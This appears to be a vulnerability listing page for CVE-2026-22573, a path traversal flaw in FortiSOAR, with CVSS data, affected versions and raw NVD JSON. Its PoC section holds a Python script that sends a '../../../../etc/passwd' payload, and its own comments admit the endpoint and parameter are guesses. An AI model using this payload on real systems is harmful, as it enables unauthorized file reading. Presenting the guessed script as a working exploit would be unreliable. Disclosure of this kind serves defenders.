Security Vulnerability Report
中文
CVE-2026-22573 CVSS 6.5 MEDIUM

CVE-2026-22573

Published: 2026-04-14 16:16:37
Last Modified: 2026-05-06 15:57:15

Description

An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform path traversal attack via File Content Extraction actions.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:* - VULNERABLE
FortiSOAR PaaS 7.6.0 - 7.6.3
FortiSOAR PaaS 7.5.x
FortiSOAR PaaS 7.4.x
FortiSOAR PaaS 7.3.x
FortiSOAR on-premise 7.6.0 - 7.6.3
FortiSOAR on-premise 7.5.x
FortiSOAR on-premise 7.4.x
FortiSOAR on-premise 7.3.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL for the vulnerable endpoint (Hypothetical based on description) target_url = "https://<target-ip>/api/file_content_extraction" # Attacker credentials (Low privilege required) auth = ("low_priv_user", "password") # Payload attempting to read /etc/passwd using path traversal # The parameter name 'file_path' is an example based on "File Content Extraction actions" payload = { "file_path": "../../../../etc/passwd", "action": "extract" } try: # Send POST request with authentication response = requests.post(target_url, auth=auth, json=payload, verify=False) # Check if the attack was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! File content retrieved:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print("Status code:", response.status_code) print("Response:", response.text[:200]) # Print partial response to avoid clutter except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22573", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:36.550", "lastModified": "2026-05-06T15:57:14.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform path traversal attack via File Content Extraction actions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndIncluding": "7.3.3", "matchCriteriaId": "030CE7E8-05B5-4AE0-AD59-5D07150DEF46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndIncluding": "7.4.5", "matchCriteriaId": "46AD20C7-44D4-4DDE-B74A-BEB8B3890277"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.5.0", "versionEndIncluding": "7.5.3", "matchCriteriaId": "86B32392-F2E0-49FE-988A-02CC6D257DBD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisoar:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndIncluding": "7.6.3", "matchCriteriaId": "DEB8A1CE-2EB8-43B7-9E9A-0106BF54631E"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-116", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}